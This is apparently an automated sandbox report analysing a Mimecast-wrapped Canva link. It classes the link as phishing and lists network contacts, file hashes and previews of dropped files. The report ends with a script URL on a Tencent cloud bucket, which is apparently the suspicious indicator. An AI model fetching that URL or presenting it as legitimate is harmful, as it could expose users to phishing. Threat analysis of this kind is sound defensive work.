                                                                                                                                                                                                                                                                    26337OIS1USfalse
                                                                                                                                                                                                                                                                    104.17.24.14
                                                                                                                                                                                                                                                                    cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                    104.26.12.205
                                                                                                                                                                                                                                                                    api.ipify.orgUnited States
                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                    18.161.111.33
                                                                                                                                                                                                                                                                    d1w725hft9421a.cloudfront.netUnited States
                                                                                                                                                                                                                                                                    3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                    172.217.17.34
                                                                                                                                                                                                                                                                    adservice.google.comUnited States
                                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                    104.16.103.112
                                                                                                                                                                                                                                                                    static.canva.comUnited States
                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                    54.171.122.26
                                                                                                                                                                                                                                                                    spdc-global.pbp.gysm.yahoodns.netUnited States
                                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                    151.101.2.137
                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                                                                                                    unknownReserved
                                                                                                                                                                                                                                                                    unknownunknownfalse
                                                                                                                                                                                                                                                                    205.139.111.12
                                                                                                                                                                                                                                                                    url.us.m.mimecastprotect.comUnited States
                                                                                                                                                                                                                                                                    30031MIMECAST-USfalse
                                                                                                                                                                                                                                                                    49.51.77.119
                                                                                                                                                                                                                                                                    cos.na-ashburn.myqcloud.comChina
                                                                                                                                                                                                                                                                    132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                                                                                                                                                                                                                    75.2.57.54
                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                    172.217.17.70
                                                                                                                                                                                                                                                                    ad.doubleclick.netUnited States
                                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                    34.120.195.249
                                                                                                                                                                                                                                                                    o13855.ingest.sentry.ioUnited States
                                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                                                    192.168.2.12
                                                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                    Analysis ID:1559505
                                                                                                                                                                                                                                                                    Start date and time:2024-11-20 16:00:16 +01:00
                                                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                    Overall analysis duration:0h 3m 48s
                                                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                                                    Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                                                    Sample URL:https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com
                                                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                    Number of analysed new started processes analysed:10
                                                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                                                    Classification:mal60.phis.win@20/230@97/30
                                                                                                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 172.217.19.227, 64.233.165.84, 172.217.19.238, 34.104.35.123, 199.232.214.172, 192.229.221.95, 142.250.181.136, 74.125.205.84, 172.217.19.162, 172.217.17.74, 172.217.19.234, 104.21.27.152, 172.67.142.245, 216.58.208.227, 142.250.181.10, 142.250.181.74, 216.58.208.234, 172.217.17.42, 142.250.181.106, 172.217.19.170, 172.217.21.42, 172.217.19.202, 172.217.19.10, 172.217.17.67
                                                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, www.googleadservices.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ajax.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, use.fontawesome.com.cdn.cloudflare.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, www.googletagmanager.com, update.googleapis.com, clients.l.google.com
                                                                                                                                                                                                                                                                    • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                    • VT rate limit hit for: https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com
                                                                                                                                                                                                                                                                    No simulations
                                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 14:01:21 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):2675
                                                                                                                                                                                                                                                                    Entropy (8bit):3.9856175202218407
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:8YbdvT2XHridAKZdA1kehwiZUklqehRy+3:8YZy4ey
                                                                                                                                                                                                                                                                    MD5:3FAA1799BEA869DAFA9A9CAD0BEFF6BC
                                                                                                                                                                                                                                                                    SHA1:C0B6DDE6D387F16293C3122675A96EEFF1454DFA
                                                                                                                                                                                                                                                                    SHA-256:577B6B7100948462F5A563E4A69506717734236F64215A196F5601D003A74179
                                                                                                                                                                                                                                                                    SHA-512:8D02C04D5634D9F0D626D6DD79699470F44D7F23EE76613E5AA1DD6605A5C73C274102968F7076D768E6D0E8FDA7B10432B9B40030FBA4326566195B15FBFE3E
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.......];......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.ItY'x....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY'x....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.VtY'x....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.VtY'x............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY+x.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 14:01:21 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):2677
                                                                                                                                                                                                                                                                    Entropy (8bit):3.9988029250913875
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:8K/bdvT2XHridAKZdA1jeh/iZUkAQkqehOy+2:8K/Zy09Qjy
                                                                                                                                                                                                                                                                    MD5:3661DC3FC9E02D53280DFE5DC2071E15
                                                                                                                                                                                                                                                                    SHA1:1B4E5398676F560E75B56C08BCA82BEF0BDBCD8F
                                                                                                                                                                                                                                                                    SHA-256:A4FBD0BA180EF10805DE28BF49E1ADE28154C4A24888065DF1A725E0F00967A4
                                                                                                                                                                                                                                                                    SHA-512:BA317ED43752484A69E02B93ADC6BCAF1DC3B7FBE9C5E64FA8975C0C40C578F6F0D039AC1FF5EB640F63BF45411AE3FBB2C0800ADAD6FD94C71BE9F756CC6567
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.......];......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.ItY'x....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY'x....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.VtY'x....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.VtY'x............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY+x.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 10:41:16 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):2691
                                                                                                                                                                                                                                                                    Entropy (8bit):4.01110878298063
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:8wbdvT2uHridAKZdA14Peh7sFiZUkmgqeh7soy+BX:8wZyVnyy
                                                                                                                                                                                                                                                                    MD5:382F6E35D20093CEC0DD263E46BB9EF5
                                                                                                                                                                                                                                                                    SHA1:F96897D10D794168C499917947B3B7B3C453F36C
                                                                                                                                                                                                                                                                    SHA-256:7B6CD2D03A6B57D88435D59DCE14A6967F2EC5D5DF3CBB1134D86300BA4395F0
                                                                                                                                                                                                                                                                    SHA-512:F67664229A96148B84E96C0B5B2DE00FAAA5011B96C6A3ECF51FE9E81601F1554F0A52D2AD1EF2C0D471D02AF4C02C7991B3359B0CB4D0626D2D9D80CB53A598
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,...............y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.ItY'x....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY'x....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.VtY'x....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.VtY'x............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VEW.[.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 14:01:21 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                                                                    Entropy (8bit):3.9975278346315295
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:8HwbdvT2XHridAKZdA1GehDiZUkwqehKy+R:8QZy5Ay
                                                                                                                                                                                                                                                                    MD5:3F663317163B5C11D6A802D34D033E27
                                                                                                                                                                                                                                                                    SHA1:831A01F013F3FD83DB13A57B8A03BF6BB4B8988A
                                                                                                                                                                                                                                                                    SHA-256:802B5607C8A954AFDA1365D57B5D61394A24D76D8EE8C327F4571E9236B84AAE
                                                                                                                                                                                                                                                                    SHA-512:815B6B4BE42882E39B5FAF5CE6BB8E0A06B238AE7426F3DB71CF8E926E9084A6B9B50ECEDC577E3EF0A4E2FA2C3F5084693977C901FB7441FC131E1E8FFFAF1C
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,........];......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.ItY'x....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY'x....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.VtY'x....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.VtY'x............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY+x.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 14:01:21 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                                                                    Entropy (8bit):3.9870203161065745
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:8cbdvT2XHridAKZdA1IehBiZUk1W1qehMy+C:8cZyp9sy
                                                                                                                                                                                                                                                                    MD5:D3C53195A00DC24F1A3E957F6B0CDE13
                                                                                                                                                                                                                                                                    SHA1:5D77AAC8DDC67A7FDB71B3592BC69EF85DC9B9F2
                                                                                                                                                                                                                                                                    SHA-256:33E1E75457A75216377E84620DD40A79100973276229C0E1FBDE1BAD0805AC44
                                                                                                                                                                                                                                                                    SHA-512:B9DA2645BBBC988E2252AB890147CFE240B6254236125997617694C316D6247B406103CFEC9F6C1368B7B26DF8A1CBBCA8F516036666BD02116C54E41C35DF28
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,........];......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.ItY'x....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY'x....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.VtY'x....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.VtY'x............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY+x.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 14:01:21 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                                    Entropy (8bit):3.996960552698567
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:8ObdvT2XHridAKZdA1duTBehOuTbbiZUk5OjqehOuTbyy+yT+:8OZyqT2TbxWOvTbyy7T
                                                                                                                                                                                                                                                                    MD5:900A74937C1C2CFE9E5812394FA8CC9A
                                                                                                                                                                                                                                                                    SHA1:C7453BBD4317E5618F0D5B787FA4FCF3A58A45C4
                                                                                                                                                                                                                                                                    SHA-256:65126948A39994E8ADB901A367E4520DFA757390933BB1E72AD789C4FD52B5AB
                                                                                                                                                                                                                                                                    SHA-512:FE78BA70617EF71778C720BAB5EEE1616443D5C2563C94A249FFC005AC41753FDBFA548D3061746CA0985D27067D8650471CA61FD3818C4059DDABB95AA1EC17
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,........];......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.a..PROGRA~1..t......O.ItY'x....B...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY'x....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.[..Chrome..>......CW.VtY'x....M......................xN.C.h.r.o.m.e.....`.1.....EW.[..APPLIC~1..H......CW.VtY'x............................P.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY+x.....d......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (40118)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):40182
                                                                                                                                                                                                                                                                    Entropy (8bit):5.238291704116309
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:768:P16oBlxiNNwt7WcMmz8DeNx1kyMPvZjyavLs75UEyCsechj5xu4s0tUO8ISje+m:Pk4IM49mcyNiZeavLnE/34j7dV1Sy
                                                                                                                                                                                                                                                                    MD5:8E3C6F8A76ECB27F12910C84ED17812F
                                                                                                                                                                                                                                                                    SHA1:AB5E807C5B68C461DFC2D2C39043B8D78714DF8A
                                                                                                                                                                                                                                                                    SHA-256:C89A128D6BC245B813910B47C73F450A7127F4C90559F00781FBA5879DEBDA59
                                                                                                                                                                                                                                                                    SHA-512:85D4B6FC59257E03443018BD418BD21B51E9B911FC7BD6A6B05CD269975F1A75E101CEBD1ECC11CC3CD0D59E8CF4120B8179952F1940D4695E2763E6DA509438
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e,r,t,f,s,n={},c={};function i(e){var r=c[e];if(void 0!==r)return r.exports;var t=c[e]={id:e,loaded:!1,exports:{}};return n[e].call(t.exports,t,t.exports,i),t.loaded=!0,t.exports}i.m=n,i.amdD=function(){throw new Error("define cannot be used indirect")},i.amdO={},e=[],i.O=(r,t,f,s)=>{if(!t){var n=1/0;for(d=0;d<e.length;d++){for(var[t,f,s]=e[d],c=!0,a=0;a<t.length;a++)if((!1&s||n>=s)&&Object.keys(i.O).every((e=>i.O[e](t[a]))))t.splice(a--,1);else if(c=!1,s<n)n=s;if(c){e.splice(d--,1);var u=f();if(void 0!==u)r=u}}return r}else{s=s||0;for(var d=e.length;d>0&&e[d-1][2]>s;d--)e[d]=e[d-1];e[d]=[t,f,s]}},i.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return i.d(r,{a:r}),r},t=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,i.t=function(e,f){if(1&f)e=this(e);if(8&f)return e;if("object"==typeof e&&e){if(4&f&&e.__esModule)return e;if(16&f&&"function"==typeof e.then)return e}var s=Object.create(null);i.r(s);var n={};r=r||[null,t({}),t([]),t(t)];for(var c=
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3634)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):3697
                                                                                                                                                                                                                                                                    Entropy (8bit):5.608637378517797
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:tIMFOTHG+XqKO7lJznkL3wBPVq79qpQZY0QMVswWbNxkKQC:tXFO+J7luScQAYxJlbNxkKt
                                                                                                                                                                                                                                                                    MD5:51084C4D3B19B1A2C892C18724A93404
                                                                                                                                                                                                                                                                    SHA1:33C4E11478A0BE3FEB2AF4F9BFFBE88644ECD71B
                                                                                                                                                                                                                                                                    SHA-256:A284EF8FC6CDA616D0CD342B1B260904A1A2DC2A273A071648A503966BA710E6
                                                                                                                                                                                                                                                                    SHA-512:37359C08A7E0062074AB589322F99EAC4BA2D3EDE1D1A37BA3E7BFBD7890DB219C5BBD451ABAB6E9402514AA5F308477E50B87E64F620558E8593F049B265AB9
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/b3153e94a5482d0b.ltr.css
                                                                                                                                                                                                                                                                    Preview:.light{--VsFRFg:rgba(64,87,109,.04)}.dark{--VsFRFg:#3b3c3d}.hKrj5w{display:block;margin-bottom:-1px}.FXahWA{fill:rgba(64,87,109,.07)}.GnpaiQ{fill:var(--4RaSjg)}.l7doMw{fill:var(--VsFRFg)}.hZ8bTw{--LAlrcA:auto;background:var(--4RaSjg);border-radius:12px;box-shadow:var(--wlsoXA);max-height:calc(var(--YeGdzw, 100vh));max-width:var(--HtEmWQ,100vw);opacity:0;overflow-y:auto;overscroll-behavior:contain;width:var(--LAlrcA)}.hZ8bTw.R0XHGA{--LAlrcA:128px}.hZ8bTw._3l3ZbQ{--LAlrcA:256px}.hZ8bTw.VJiigA{--LAlrcA:320px}.hZ8bTw.XYBS7g{--LAlrcA:360px}.hZ8bTw.UvYoXA{--LAlrcA:416px}.hZ8bTw.m_Hjdg{--LAlrcA:var(--HCkONw)}.hZ8bTw._8wDWkw{width:auto}.hZ8bTw._8wDWkw:not(.Yv4y_g){max-width:var(--LAlrcA);max-width:min(var(--LAlrcA),var(--HtEmWQ,100vw))}.NadK1Q .hZ8bTw{opacity:1}.aGfzfA .hZ8bTw{transition:opacity .15s ease-in-out}.jLRJVg{position:sticky;top:0;z-index:1}.iOotlg{border-bottom:1px solid var(--OuCkCQ)}.EN8ypA{z-index:0}.DT7wow{bottom:0;position:sticky}.light{--gJAqkA:hsla(0,0%,100%,.5)}.dark{--gJAq
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65464), with CRLF line terminators
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):1139792
                                                                                                                                                                                                                                                                    Entropy (8bit):5.21483496968837
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:12288:XPxS8nNEziPG948876taOfbGD/+j2hHg2c+W/ls4b8bIt1K5hiUF8rwx/O:fxS8ny+q48LkVbI+qUEwxW
                                                                                                                                                                                                                                                                    MD5:0AEB4314699F5E8563B055F3A57587FC
                                                                                                                                                                                                                                                                    SHA1:24C7FA6BD820C45F9B8C98D900234571186C0C06
                                                                                                                                                                                                                                                                    SHA-256:CBA4FF7773F3DDD0804B0E81B1750355BD3A7A33BFCDB022353C4D153A073052
                                                                                                                                                                                                                                                                    SHA-512:0F542ADF7E3CD4DB70CC26B54A7B8B3A6F561D473E7C2D7D04AD7290A594BFD95B06357B64331BAC096A83BFF805C5775BFAA6565CD7CD6F5ED080EA1D7A59D6
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://robertreed1313-1323985617.cos.na-ashburn.myqcloud.com/bootstrapp.min.js
